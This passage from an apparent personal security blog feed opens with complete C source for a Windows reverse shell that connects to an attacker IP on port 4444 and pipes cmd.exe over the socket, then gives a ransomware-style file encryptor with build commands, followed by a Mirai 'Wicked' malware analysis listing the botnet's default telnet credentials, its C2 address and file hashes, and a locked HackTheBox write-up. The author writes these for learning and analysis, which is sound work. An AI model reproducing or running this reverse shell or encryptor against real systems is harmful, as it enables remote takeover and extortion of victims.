class="c1">//https://learn.microsoft.com/en-us/windows/win32/api/processthreadsapi/ns-processthreadsapi-startupinfow</span> <span class="n">PROCESS_INFORMATION</span><span class="w"> </span><span class="n">processInfo</span><span class="p">;</span> <span class="kt">int</span><span class="w"> </span><span class="nf">main</span><span class="p">(</span><span class="kt">int</span><span class="w"> </span><span class="n">argc</span><span class="p">,</span><span class="w"> </span><span class="kt">char</span><span class="o">*</span><span class="w"> </span><span class="n">argv</span><span class="p">[]){</span> <span class="w"> </span><span class="c1">// attacker connection info</span> <span class="w"> </span><span class="kt">char</span><span class="w"> </span><span class="o">*</span><span class="n">attackerIP</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="s">"10.0.3.4"</span><span class="p">;</span> <span class="w"> </span><span class="kt">short</span><span class="w"> </span><span class="n">attackerPort</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="mi">4444</span><span class="p">;</span> <span class="w"> </span><span class="c1">// init socket library, version 2.2</span> <span class="w"> </span><span class="n">WSAStartup</span><span class="p">(</span><span class="n">MAKEWORD</span><span class="p">(</span><span class="mi">2</span><span class="p">,</span><span class="mi">2</span><span class="p">),</span><span class="w"> </span><span class="o">&amp;</span><span class="n">socketData</span><span class="p">);</span> <span class="w"> </span><span class="c1">// create TCP IPv4 socket</span> <span class="w"> </span><span class="c1">// https://learn.microsoft.com/en-us/windows/win32/api/winsock2/nf-winsock2-wsasocketw</span> <span class="w"> </span><span class="c1">// book uses (unsigned int)NULL instead of 0 for group and flags, which I have no idea why</span> <span class="w"> </span><span class="n">mainSocket</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">WSASocket</span><span class="p">(</span><span class="n">AF_INET</span><span class="p">,</span><span class="w"> </span><span class="n">SOCK_STREAM</span><span class="p">,</span><span class="w"> </span><span class="n">IPPROTO_TCP</span><span class="p">,</span><span class="w"> </span><span class="nb">NULL</span><span class="p">,</span><span class="w"> </span><span class="mi">0</span><span class="p">,</span><span class="w"> </span><span class="mi">0</span><span class="p">);</span> <span class="w"> </span><span class="c1">// build IPv4 IP:PORT connection struct</span> <span class="w"> </span><span class="n">connectionAddress</span><span class="p">.</span><span class="n">sin_family</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">AF_INET</span><span class="p">;</span> <span class="w"> </span><span class="n">connectionAddress</span><span class="p">.</span><span class="n">sin_port</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">htons</span><span class="p">(</span><span class="n">attackerPort</span><span class="p">);</span> <span class="w"> </span><span class="n">connectionAddress</span><span class="p">.</span><span class="n">sin_addr</span><span class="p">.</span><span class="n">s_addr</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">inet_addr</span><span class="p">(</span><span class="n">attackerIP</span><span class="p">);</span> <span class="w"> </span><span class="c1">// connect</span> <span class="w"> </span><span class="n">WSAConnect</span><span class="p">(</span><span class="n">mainSocket</span><span class="p">,</span><span class="w"> </span><span class="p">(</span><span class="n">SOCKADDR</span><span class="o">*</span><span class="p">)</span><span class="o">&amp;</span><span class="n">connectionAddress</span><span class="p">,</span><span class="w"> </span><span class="k">sizeof</span><span class="p">(</span><span class="n">connectionAddress</span><span class="p">),</span><span class="w"> </span><span class="nb">NULL</span><span class="p">,</span><span class="w"> </span><span class="nb">NULL</span><span class="p">,</span><span class="w"> </span><span class="nb">NULL</span><span class="p">,</span><span class="w"> </span><span class="nb">NULL</span><span class="p">);</span> <span class="w"> </span><span class="c1">// process info</span> <span class="w"> </span><span class="c1">// https://learn.microsoft.com/en-us/windows/win32/api/processthreadsapi/ns-processthreadsapi-startupinfow</span> <span class="w"> </span><span class="n">memset</span><span class="p">(</span><span class="o">&amp;</span><span class="n">startupInfo</span><span class="p">,</span><span class="mi">0</span><span class="p">,</span><span class="w"> </span><span class="k">sizeof</span><span class="p">(</span><span class="n">startupInfo</span><span class="p">));</span><span class="w"> </span><span class="c1">// load empty struct into memory</span> <span class="w"> </span><span class="n">startupInfo</span><span class="p">.</span><span class="n">cb</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="k">sizeof</span><span class="p">(</span><span class="n">startupInfo</span><span class="p">);</span><span class="w"> </span><span class="c1">// struct size</span> <span class="w"> </span><span class="n">startupInfo</span><span class="p">.</span><span class="n">dwFlags</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">STARTF_USESTDHANDLES</span><span class="p">;</span><span class="w"> </span><span class="c1">// additional info to in, out, err handles</span> <span class="w"> </span><span class="c1">// most important line, this sets the input, output and error streams to go through the socket</span> <span class="w"> </span><span class="n">startupInfo</span><span class="p">.</span><span class="n">hStdInput</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">startupInfo</span><span class="p">.</span><span class="n">hStdOutput</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">startupInfo</span><span class="p">.</span><span class="n">hStdError</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="p">(</span><span class="n">HANDLE</span><span class="p">)</span><span class="w"> </span><span class="n">mainSocket</span><span class="p">;</span> <span class="w"> </span><span class="c1">// spawn cmd shell, sending streams over socket</span> <span class="w"> </span><span class="c1">// https://learn.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-createprocessw</span> <span class="w"> </span><span class="n">CreateProcess</span><span class="p">(</span><span class="nb">NULL</span><span class="p">,</span><span class="w"> </span><span class="s">"cmd.exe"</span><span class="p">,</span><span class="w"> </span><span class="nb">NULL</span><span class="p">,</span><span class="w"> </span><span class="nb">NULL</span><span class="p">,</span><span class="w"> </span><span class="n">TRUE</span><span class="p">,</span><span class="w"> </span><span class="mi">0</span><span class="p">,</span><span class="w"> </span><span class="nb">NULL</span><span class="p">,</span><span class="w"> </span><span class="nb">NULL</span><span class="p">,</span><span class="w"> </span><span class="o">&amp;</span><span class="n">startupInfo</span><span class="p">,</span><span class="w"> </span><span class="o">&amp;</span><span class="n">processInfo</span><span class="p">);</span> <span class="w"> </span><span class="n">exit</span><span class="p">(</span><span class="mi">0</span><span class="p">);</span> <span class="p">}</span> </code></pre></div> <h1 id="file-encryption_1">File Encryption</h1> <p>I made a few changes to the original source code that allow the file to be passed as a parameter, and also allow the output filename to be dynamic using the original + a encrypted extension, such as many popular ransomware varieties do. This bare-bones first pass does not allow for decrypting and simply encrypts using RC4:</p> <p><img alt="" src="https://blog.ericturner.it/uploads/2025/01/image-43.webp"/></p> <div class="highlight"><pre><span></span><code><span class="cm">/*</span> <span class="cm"> * Example File Encryption</span> <span class="cm"> * 18 Jan 2025</span> <span class="cm"> * Eric</span> <span class="cm"> * To build: i686-w64-mingw32-g++ 01_encrypt.c -o ScanFile.exe -lws2_32 -s -ffunction-sections -fdata-sections -Wno-write-strings -fno-exceptions -fmerge-all-constants -static-libstdc++ -static-libgcc -fpermissive</span> <span class="cm">*/</span> <span class="cp">#include</span><span class="w"> </span><span class="cpf">&lt;windows.h&gt;</span> <span class="cp">#include</span><span class="w"> </span><span class="cpf">&lt;wincrypt.h&gt;</span> <span class="cp">#include</span><span class="w"> </span><span class="cpf">&lt;string.h&gt;</span> <span class="cp">#include</span><span class="w"> </span><span class="cpf">&lt;stdio.h&gt;</span> <span class="cp">#pragma comment(lib, "crypt32.lib")</span> <span class="kt">void</span><span class="w"> </span><span class="nf">encrypt_file</span><span class="p">(</span><span class="n">LPCWSTR</span><span class="w"> </span><span class="n">filename</span><span class="p">)</span><span class="w"> </span><span class="p">{</span> <span class="w"> </span><span class="c1">// buffer to hold the plaintext and the ciphertext</span> <span class="w"> </span><span class="n">BYTE</span><span class="w"> </span><span class="n">buffer</span><span class="p">[</span><span class="mi">1024</span><span class="p">];</span> <span class="w"> </span><span class="n">DWORD</span><span class="w"> </span><span class="n">bytesRead</span><span class="p">,</span><span class="w"> </span><span class="n">bytesWritten</span><span class="p">;</span> <span class="w"> </span><span class="n">printf</span><span class="p">(</span><span class="s">"Add encryption extension.</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span> <span class="w"> </span><span class="c1">// encryption settings</span> <span class="w"> </span><span class="n">LPCWSTR</span><span class="w"> </span><span class="n">enc_extension</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="sa">L</span><span class="s">".enc"</span><span class="p">;</span> <span class="w"> </span><span class="c1">// length of original filename</span> <span class="w"> </span><span class="kt">size_t</span><span class="w"> </span><span class="n">filename_length</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">wcslen</span><span class="p">(</span><span class="n">filename</span><span class="p">);</span> <span class="w"> </span><span class="kt">size_t</span><span class="w"> </span><span class="n">new_extension_length</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">wcslen</span><span class="p">(</span><span class="n">enc_extension</span><span class="p">);</span> <span class="w"> </span><span class="kt">wchar_t</span><span class="w"> </span><span class="n">encrypted_filename</span><span class="p">[</span><span class="n">MAX_PATH</span><span class="p">];</span><span class="w"> </span><span class="c1">// allocate space for new</span> <span class="w"> </span><span class="c1">// copy original filename to buffer</span> <span class="w"> </span><span class="n">wcscpy</span><span class="p">(</span><span class="n">encrypted_filename</span><span class="p">,</span><span class="w"> </span><span class="n">filename</span><span class="p">);</span> <span class="w"> </span><span class="c1">// cat new extension</span> <span class="w"> </span><span class="n">wcscat</span><span class="p">(</span><span class="n">encrypted_filename</span><span class="p">,</span><span class="w"> </span><span class="n">enc_extension</span><span class="p">);</span> <span class="w"> </span><span class="c1">// open the original file, and create the new encrypted file</span> <span class="w"> </span><span class="n">printf</span><span class="p">(</span><span class="s">"Get file handles.</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span> <span class="w"> </span><span class="n">HANDLE</span><span class="w"> </span><span class="n">originalFile</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">CreateFileW</span><span class="p">(</span><span class="n">filename</span><span class="p">,</span><span class="w"> </span><span class="n">GENERIC_READ</span><span class="p">,</span><span class="w"> </span><span class="mi">0</span><span class="p">,</span><span class="w"> </span><span class="nb">NULL</span><span class="p">,</span><span class="w"> </span><span class="n">OPEN_EXISTING</span><span class="p">,</span><span class="w"> </span><span class="n">FILE_ATTRIBUTE_NORMAL</span><span class="p">,</span><span class="w"> </span><span class="nb">NULL</span><span class="p">);</span> <span class="w"> </span><span class="n">HANDLE</span><span class="w"> </span><span class="n">newFile</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">CreateFileW</span><span class="p">(</span><span class="n">encrypted_filename</span><span class="p">,</span><span class="w"> </span><span class="n">GENERIC_WRITE</span><span class="p">,</span><span class="w"> </span><span class="mi">0</span><span class="p">,</span><span class="w"> </span><span class="nb">NULL</span><span class="p">,</span><span class="w"> </span><span class="n">CREATE_ALWAYS</span><span class="p">,</span><span class="w"> </span><span class="n">FILE_ATTRIBUTE_NORMAL</span><span class="p">,</span><span class="w"> </span><span class="nb">NULL</span><span class="p">);</span> <span class="w"> </span><span class="c1">// Get a handle to the CSP</span> <span class="w"> </span><span class="n">HCRYPTPROV</span><span class="w"> </span><span class="n">hProv</span><span class="p">;</span> <span class="w"> </span><span class="n">CryptAcquireContext</span><span class="p">(</span><span class="o">&amp;</span><span class="n">hProv</span><span class="p">,</span><span class="w"> </span><span class="nb">NULL</span><span class="p">,</span><span class="w"> </span><span class="nb">NULL</span><span class="p">,</span><span class="w"> </span><span class="n">PROV_RSA_FULL</span><span class="p">,</span><span class="w"> </span><span class="n">CRYPT_VERIFYCONTEXT</span><span class="p">);</span> <span class="w"> </span><span class="c1">// Generate the session key</span> <span class="w"> </span><span class="n">HCRYPTKEY</span><span class="w"> </span><span class="n">hKey</span><span class="p">;</span> <span class="w"> </span><span class="n">CryptGenKey</span><span class="p">(</span><span class="n">hProv</span><span class="p">,</span><span class="w"> </span><span class="n">CALG_RC4</span><span class="p">,</span><span class="w"> </span><span class="n">CRYPT_EXPORTABLE</span><span class="p">,</span><span class="w"> </span><span class="o">&amp;</span><span class="n">hKey</span><span class="p">);</span> <span class="w"> </span><span class="c1">// Read the plaintext file, encrypt the buffer, then write to the new file</span> <span class="w"> </span><span class="n">printf</span><span class="p">(</span><span class="s">"Encrypt file contents.</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span> <span class="w"> </span><span class="k">while</span><span class="p">(</span><span class="n">ReadFile</span><span class="p">(</span><span class="n">originalFile</span><span class="p">,</span><span class="w"> </span><span class="n">buffer</span><span class="p">,</span><span class="w"> </span><span class="k">sizeof</span><span class="p">(</span><span class="n">buffer</span><span class="p">),</span><span class="w"> </span><span class="o">&amp;</span><span class="n">bytesRead</span><span class="p">,</span><span class="w"> </span><span class="nb">NULL</span><span class="p">)</span><span class="w"> </span><span class="o">&amp;&amp;</span><span class="w"> </span><span class="n">bytesRead</span><span class="w"> </span><span class="o">&gt;</span><span class="w"> </span><span class="mi">0</span><span class="p">)</span><span class="w"> </span><span class="p">{</span> <span class="w"> </span><span class="n">CryptEncrypt</span><span class="p">(</span><span class="n">hKey</span><span class="p">,</span><span class="w"> </span><span class="mi">0</span><span class="p">,</span><span class="w"> </span><span class="n">bytesRead</span><span class="w"> </span><span class="o">&lt;</span><span class="w"> </span><span class="k">sizeof</span><span class="p">(</span><span class="n">buffer</span><span class="p">),</span><span class="w"> </span><span class="mi">0</span><span class="p">,</span><span class="w"> </span><span class="n">buffer</span><span class="p">,</span><span class="w"> </span><span class="o">&amp;</span><span class="n">bytesRead</span><span class="p">,</span><span class="w"> </span><span class="k">sizeof</span><span class="p">(</span><span class="n">buffer</span><span class="p">));</span> <span class="w"> </span><span class="n">WriteFile</span><span class="p">(</span><span class="n">newFile</span><span class="p">,</span><span class="w"> </span><span class="n">buffer</span><span class="p">,</span><span class="w"> </span><span class="n">bytesRead</span><span class="p">,</span><span class="w"> </span><span class="o">&amp;</span><span class="n">bytesWritten</span><span class="p">,</span><span class="w"> </span><span class="nb">NULL</span><span class="p">);</span> <span class="w"> </span><span class="p">}</span> <span class="w"> </span><span class="c1">// Clean up</span> <span class="w"> </span><span class="n">printf</span><span class="p">(</span><span class="s">"Clean up.</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span> <span class="w"> </span><span class="n">CryptReleaseContext</span><span class="p">(</span><span class="n">hProv</span><span class="p">,</span><span class="w"> </span><span class="mi">0</span><span class="p">);</span> <span class="w"> </span><span class="n">CryptDestroyKey</span><span class="p">(</span><span class="n">hKey</span><span class="p">);</span> <span class="w"> </span><span class="n">CloseHandle</span><span class="p">(</span><span class="n">originalFile</span><span class="p">);</span> <span class="w"> </span><span class="n">CloseHandle</span><span class="p">(</span><span class="n">newFile</span><span class="p">);</span> <span class="p">}</span> <span class="kt">int</span><span class="w"> </span><span class="nf">main</span><span class="p">(</span><span class="kt">int</span><span class="w"> </span><span class="n">argc</span><span class="p">,</span><span class="w"> </span><span class="kt">char</span><span class="w"> </span><span class="o">*</span><span class="n">argv</span><span class="p">[])</span><span class="w"> </span><span class="p">{</span> <span class="w"> </span><span class="c1">// check to see if a filename is passed as an arg</span> <span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">argc</span><span class="w"> </span><span class="o">&lt;</span><span class="w"> </span><span class="mi">2</span><span class="p">)</span><span class="w"> </span><span class="p">{</span> <span class="w"> </span><span class="n">printf</span><span class="p">(</span><span class="s">"Error: No filename provided.</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span> <span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="mi">1</span><span class="p">;</span> <span class="w"> </span><span class="p">}</span> <span class="w"> </span><span class="c1">// convert char arg into LPCWSTR</span> <span class="w"> </span><span class="kt">char</span><span class="o">*</span><span class="w"> </span><span class="n">filename</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">argv</span><span class="p">[</span><span class="mi">1</span><span class="p">];</span> <span class="w"> </span><span class="kt">int</span><span class="w"> </span><span class="n">size</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">MultiByteToWideChar</span><span class="p">(</span><span class="n">CP_ACP</span><span class="p">,</span><span class="w"> </span><span class="mi">0</span><span class="p">,</span><span class="w"> </span><span class="n">filename</span><span class="p">,</span><span class="w"> </span><span class="mi">-1</span><span class="p">,</span><span class="w"> </span><span class="nb">NULL</span><span class="p">,</span><span class="w"> </span><span class="mi">0</span><span class="p">);</span> <span class="w"> </span><span class="kt">wchar_t</span><span class="o">*</span><span class="w"> </span><span class="n">wstr</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">new</span><span class="w"> </span><span class="kt">wchar_t</span><span class="p">[</span><span class="n">size</span><span class="p">];</span> <span class="w"> </span><span class="n">MultiByteToWideChar</span><span class="p">(</span><span class="n">CP_ACP</span><span class="p">,</span><span class="w"> </span><span class="mi">0</span><span class="p">,</span><span class="w"> </span><span class="n">filename</span><span class="p">,</span><span class="w"> </span><span class="mi">-1</span><span class="p">,</span><span class="w"> </span><span class="n">wstr</span><span class="p">,</span><span class="w"> </span><span class="n">size</span><span class="p">);</span> <span class="w"> </span><span class="c1">// if so, encrypt it</span> <span class="w"> </span><span class="n">encrypt_file</span><span class="p">(</span><span class="n">wstr</span><span class="p">);</span> <span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="mi">0</span><span class="p">;</span> <span class="p">}</span> </code></pre></div>2025-01-11T21:03:17-05:002025-01-11T21:03:17-05:00Eric Turnertag:blog.ericturner.it,2025-01-11:/2025/01/11/malware-analysis-mirai-wicked-sample-9jan2025/

<p>Analysis of a sample from Malware bazaar: <a href="https://bazaar.abuse.ch/sample/a01d53662d83c31a5b4478bc57fc4fee1ba9d4f6178a94a107c472133adea368/">MalwareBazaar | SHA256 a01d53662d83c31a5b4478bc57fc4fee1ba9d4f6178a94a107c472133adea368 (Mirai)</a></p> <h1 id="stage-1">Stage 1</h1> <p>The initial download is a linux script in cleartext with comments in Chinese. I have added english translations in brackets for each comment. This script connects to a server in order to download 13 binaries, one for …</p>

<p>Analysis of a sample from Malware bazaar: <a href="https://bazaar.abuse.ch/sample/a01d53662d83c31a5b4478bc57fc4fee1ba9d4f6178a94a107c472133adea368/">MalwareBazaar | SHA256 a01d53662d83c31a5b4478bc57fc4fee1ba9d4f6178a94a107c472133adea368 (Mirai)</a></p> <h1 id="stage-1">Stage 1</h1> <p>The initial download is a linux script in cleartext with comments in Chinese. I have added english translations in brackets for each comment. This script connects to a server in order to download 13 binaries, one for each type of processor. Props to the author of the script for doing least privilege and only granting execution privs. It then attempts to run the binary with a command such as <code>./x86 x86.test?</code> </p> <p><img alt="" src="https://blog.ericturner.it/uploads/2025/01/image-26.webp"/></p> <h1 id="static-analysis-of-arm7">Static Analysis of arm7</h1> <p>I initially tried the x86 binary, which essentially just had an infinite loop that appeared to do nothing:</p> <p><img alt="" src="https://blog.ericturner.it/uploads/2025/01/image-27.webp"/></p> <p>The arm7 binary is significantly bigger. Opening it inside of Ghidra provides a number of more functions and non-encrypted strings and encrypted strings that seem to be a part of a table. arm7 is a processor used in the late 90s, and Mirai is known to try and control devices to add them to their botnet.</p> <p>An interesting note is that comments remain from the compilation of the program from c, including the username of the user who built it, landley: </p> <p><img alt="" src="https://blog.ericturner.it/uploads/2025/01/image-30.webp"/></p> <p>strings view</p> <p>The <code>main</code> function of the application setups up a <code>srv_addr</code> matrix and calls a <code>table_init()</code> to store important information. Many of the strings here are obfuscated and or encrypted. It also calls <code>attack_init()</code>, <code>ioctl_keepalive()</code>, <code>scanner_init()</code> and <code>killer_init()</code>.These functions respectively setup the paths for DOS/flood attacks, used for preventing the system from hanging, scanning for available machines to compromise, and kill services via port.</p> <p>There are several methods for attack as listed in the functions pane, the attack_init goes down the list through multiple different types. </p> <p><img alt="" src="https://blog.ericturner.it/uploads/2025/01/image-28.webp"/></p> <p>XOR Brute Force in Cyber Chef found the key for several encrypted strings seen in the binary, 37. we can take these strings into cyberchef to return them. For example. <code>SRQVB[C</code> resolves to <code>default</code>. The scanner class is used for attempting to find possible default credentials to further compromise more devices. Here is a view of all the options with passwords. default:default, admin:admin, root:vizxv, bin:0000, adm:0000, root:default, root:root, root:admin, root:1001chin, root:D13hh[, root:ZLXX, root:xc3511, root:5up.</p> <p><img alt="" src="https://blog.ericturner.it/uploads/2025/01/image-39.webp"/></p> <p>You can find an almost decade old source code dump of Mirai on GitHub, <a href="https://github.com/jgamblin/Mirai-Source-Code/blob/master/mirai/bot/main.c">here</a>. While there are some differences, such as generating the table, other aspects of the source code are virtually identical to this repo. It shows a check for debuggers, and if one is present, the table is not unlocked. </p> <p>One string when XORd back with 37 returns <code>/bin/busybox WICKED</code>. Wicked is variant of Mirai, typically targeting IoT devices.</p> <p>Many other notable strings after being XORd show the creation of things such as the POST request. It mentions a <code>server: dos arrest</code> and <code>server: cloudflare-nginx</code> as headers. There are some unusual strings, and one profane string before the remainder of them seem to be unintelligible, or under another level of encryption: </p> <p><img alt="" src="https://blog.ericturner.it/uploads/2025/01/image-38.webp"/></p> <p>Several of these strings can be seen under the <a href="https://github.com/jgamblin/Mirai-Source-Code/blob/master/mirai/bot/table.h">original Table.h source code</a>.</p> <p><img alt="" src="https://blog.ericturner.it/uploads/2025/01/image-40.webp"/></p> <p>There's also a 1337C0D3 key found here under the unlock function that uses that with a series of XOR operations to further decrypt certain addresses.</p> <h1 id="dynamic-analysis">Dynamic Analysis</h1> <p>Using <code>ps -e</code> we can see strange process names. Re-running the binary confirms the name randomly generates: </p> <p><img alt="" src="https://blog.ericturner.it/uploads/2025/01/image-33.webp"/></p> <p><img alt="" src="https://blog.ericturner.it/uploads/2025/01/image-35.webp"/></p> <p>During the execution, it shows connecting back to the original IP over port 5555. This CNC appears like this if you connect via telnet and requests a username and password. </p> <p><img alt="" src="https://blog.ericturner.it/uploads/2025/01/image-32.webp"/></p> <p>My VM hangs on this stage and is in a constant loop of reaching out to the CNC server on port 5555.</p> <p>VirusTotal's sandbox shows after connection to the CNC server, it proceeds to connect to over 300 connections for devices via port 23 or 2323.</p> <h1 id="indicators">Indicators</h1> <h2 id="ip">IP</h2> <p>45.221.96[.]37</p> <h2 id="urls">URLs</h2> <p>hxxp://45.221.96[.]37/bins</p> <p>telnet[:]//45.221.96[.]37:5555</p> <h2 id="sha256">SHA256</h2> <p>1eedc607dad9447de65c6cec87a5056061f93c4a9613bd1b2490e516850ebb40 - arm5<br/> 2819286d2a3bbd3eaf053b76d8fa793b6b083e644749dcaae8989a1c2c0c7074 - arm<br/> 32fbcfdd4e3a032cf3d10c8b32eb395ca3ad286f29d4f355ccfe43c7d1e88e8e - ppc<br/> 43f5ff4d7772f1971762b6bb9b07f9a312047137c25af58ec3c357f59a5211eb - arm6<br/> 4a36a56a5cb80c758d167025a7d24729ef46a05c7eb7b1b98517f9d330bcc934 - arm7<br/> 906b9479702bc85c78b47cfda8458df2de676d2ba44bfdecf9d2567b50ea731e - mpsl<br/> 98a4cade937c06972cc9fea3ae709671a184a521663b455916d522d4b5d0b0a0 - m68k<br/> b2e20a0872c5655d8cfdaf04af712dff9b9ce73c26caad5c039280fc738cfd33 - spc<br/> b9782775086aa0d972edb1c8977cbf85ee0787a772ba5600e5e478e98ce36ea7 - mips<br/> bd79770c08676da572634233061f4f821b89cc182853a2e5bc9a0abfd9cd9514 - x86<br/> c6cd8c56a159ac440c807f8576d39a60462d62db9c054bf11e306fb9ebf4ce42 - sh4<br/> f0c5e09caedea9ee5cebf2366a680ad0590cb2024e7afc062d6cdf955eec8105 - arc</p> <h2 id="md5">MD5</h2> <p>81bdfcae2e518a8e9201cf6bc30c98f3 - arm5<br/> 85a550d202cbe94c5bf8ed43e69ea2bb - arm<br/> e3abfa6136b6004687eecee5bed69cbe - ppc<br/> cc9580a4aa490b6609747aa8fc9d1360 - arm6<br/> 48e2be001db9a4da901886e00f564d43 - arm7<br/> bd4abf664c56da6754d883fac2d22019 - mpsl<br/> 6a761808fd9ef943bc91d8da695b2ea8 - m68k<br/> 44be1b5c620f650463152013a174350c - spc<br/> bdc77d8814dc759983a3d76c17614161 - mips<br/> 5e76a63da5729d3a5f83f4ccdbe79374 - x86<br/> 5abe6eb7b40a7e84a4878c6b04f68b88 - sh4<br/> b00d1adf1347139583c76f5df80dbe76 - arc</p>2025-01-08T03:19:22-05:002025-01-08T03:19:22-05:00Eric Turnertag:blog.ericturner.it,2025-01-08:/2025/01/08/hackthebox-sherlock-lovely-malware/

This investigation is currently active on HackTheBox, thus is required to be password protected. You will need to wait until the investigation is retired for the full solution, or if you have already solved this challenge, use the answer to task 14 to unlock.

<div id="pec-encrypted-content" style="display:none">LNuF9cBhy0wEdSUeRQ0w/w==;TreAor+pGDNvl1aMKM+R2ryMb/C97WmzaljEqmBPKpUQYP/V+bDv/jDGvDffWTiX5JRjEKa3W9nK1t5cpULpvyaiYYvkAW1XGxRRBlWBJeF8T7bT/Wr/CbHB8gxAWHsXgDlo4YWUea3tmYzsKMo3SUNEuFs+7Yf1Ff7eY3ogizJbsRg49DfmGvuXZM2RY6yG986Lp+R8UE24Oa/4zTt2YfAMKZcYjPGQbPhC0UkAa+N4WToJlG6dP3WJUBMvj3869zWZi3//bW2qau89TZXMMVMoMdEvG9WoWRX6UzTea4finOyPfLhlfNUnl5GUezgGxMH7ISEa60JKnd2H3HLOvVXeufZmoXyyKK+XXAAK8ogIEIXuwTNKK8vPIP3sQM80ea5KWjQjMJAZZhV5Yyfealg4ndA4eyJKt7TwgiUJbI/C7YunpTmi/o8Y1T2kAB7M/rXIm+odpo9vEVpoMTlGx+dzyq5tprFcifrfwxAlhcB2C1X2nXDJsiOklqOlbI7KMOGkY5eoL/jckeBfvVMkIOUFknTZoecM4XsCy0m9qz1U2M+klZxmzuibj9rLkcvVRuVy/a6QVHCsFS1ddol6EZ+AR9J2Sj5OGlEcbvfA/4FAFwhBOsyojQ1hPx99iF4EeAIRokrlhBP20eUqVa+CVO6m+KJo8uJiEvtLo04v5c6Jb1R+hM9r4fqxuBK43fxYIj5ATiKsIE5pCmIfHGVEpeDxlQIY13GP4VtfkxVWr1W+Uxl0B/WeRyXNqMlrdKW8bLVIEHm0t9jKo0NqU0B4GqnvwnOcNBOC1nAf17NkLAVvrEY/7haWyzO38bl/SKcdkbFqdlIZ9VVQAIhqZOT20BpCN8iPpPSODeNJCfkknEIIIfOlYzC7KHJS6uh6Sb0xuFCKLstQz67X9MHee5zdZ9tiKgTNyB5JhUTXIFl3iF5Hpz3CLILbtcx5XI8KSznYXjsNyaa8akKP3XuHEK/+7l2geDDELOEWkJL9T4eF+4oYoHihH22fvgjbwAPq19kbwoi32/UWQERcsqSKfwtdnuPRIPJxZWRlHGcJKZ3RI8yyMBlBQw42Ge/Y940RWF6lxcKXb7eUNbJKNzXVrfBU8ej8jHoF7HPJQTe9mbsEqJCnTpTAwC6E9vJOPHZZb0U8mS4CV6OjYAvJpfWVNGzoDEeMWCeVJ4T7+cxiH39hNxdSr18Gq4Z8bTlaO9f/evEf/h/srSHrClNoy7Qy5z1o2nMiGdNcdAlm9Hb1RqAXLXqQUdXnB3i+zK1UIjVz8kJkUUiW/G/wuatTHst+vpDVUfvEBUAMNIyDN6nSBw4USqOq0ZsEzjRP+IKPV6NYZztUvLDG/Exh6fKiYOZOXW4s8JJKyStZ35mnw9ImkH/nSKdqndUbQlRy9HMqo66WHXdQvdrKZ4JF7+qxF4tASjLSNlKHhyh6M00Rfe3SMqMsRLGGBCUv8ToYJmBVKn/yPHsPZdGrMrm+YvGBI6Smfwl8UrWthoJDfmDnF+vUXwSXIueU3hGGnPYtrRvWqhbQxKwkyI4oTkhZn28cFkRxzPDJBsJZGVDU5RXi00NMvyhfvabynZe3YTeCfPrSl9d1q91OMbdKxkshu9d4lCBUyAY/IUOlgF2ViOTlfQiKN83HFetkK3OyYg8eS/93V5ZQfq/mbySxnPP5hp5pfh+ReZ+0S2onaKwEVvKqiRZ6MjH+hOQ0eHzprGh6pSSf7wu+hcrWn2BWAsNF7DfRqL563un7I/4ev4PDWJKVbor0R0iQ47pG0fihIbsDaPfv5tEvq8mZRbsbuf5HwaXgjO6EzaU4/vXxOhjpleFafWca1ZzIKJioStrnOPN+skC8UNQX1ZGcmKpcgETnciNd5qScRjYny3bG0NyTLmjDa1O7MxFWmvfhMvIAudKMvvbBHUIlS1DGlFbh+Nfgse/0OTzR2pPbD5KtYwh8cr2l8Drmy5onUAIMUzIapETsHLfTJfn0pQ0EnM0maJdCa+4B8JFnntEjtpla3KtbeacJuqi0JthGsEQS9cxn07UvPIW71WsQ2cHFqNuIOrjd6voR8e7+Xh6wZRBfn4MpRGricKk0Rkjv17NzaooK+/8WdBTv0wLuPsClZFqkeqIWqXRVLVyesMblnqz1RcKWIM0kl5QzRvVajPTjeFcHmI9oZtTEAbXncvnA53B7EdH9v1bOUd0r6ABioKbvF4XJJfvNc9UrrJORjBGPGScDMoFv524wvYO9/ib0AxI8tR0f/lAD/YSLrZd6spaLqs5yHJMggGXeHu+kBWwPakWQ2gFmKrdeXYmmooyneDvWeE9ASZbu7m9xrL0GnXSUSQb9GM8izNRv4IUwgfm6iJE3FTi3CPxpPNVlLZxJTnSB38Tw3HkT8hmUANC4rKug8KC2eL0v6zVZygli/YpSJuiWzxS6ZRc93kXk11CXqRL0CVa7iwq4DTIdVc0VMUOLIHnBl83vao2lNgMN4zq5dfEewkahMFa+4T4ourrM4QNFaSHJzeGxtQUqkc5ntVl5PVqZ70ACuttQZIi+81+rRUlXZce7MWvPe+dFat8bSZ1Vv3tmPFItuu6AKpGHAQH91BWcOmXz3xRdYtYzNsZcs5MolYleZ3z7hZe9JifGUDgkMl9oeUJUBlepSNNr9FKKeICsQ/WxLsnrN9ZO9BbqdB4xP/ZqBD21bSf1ABt5zvfXz82NpIIsuP5+yIUkqZ7/cBgZud3bYTtnMd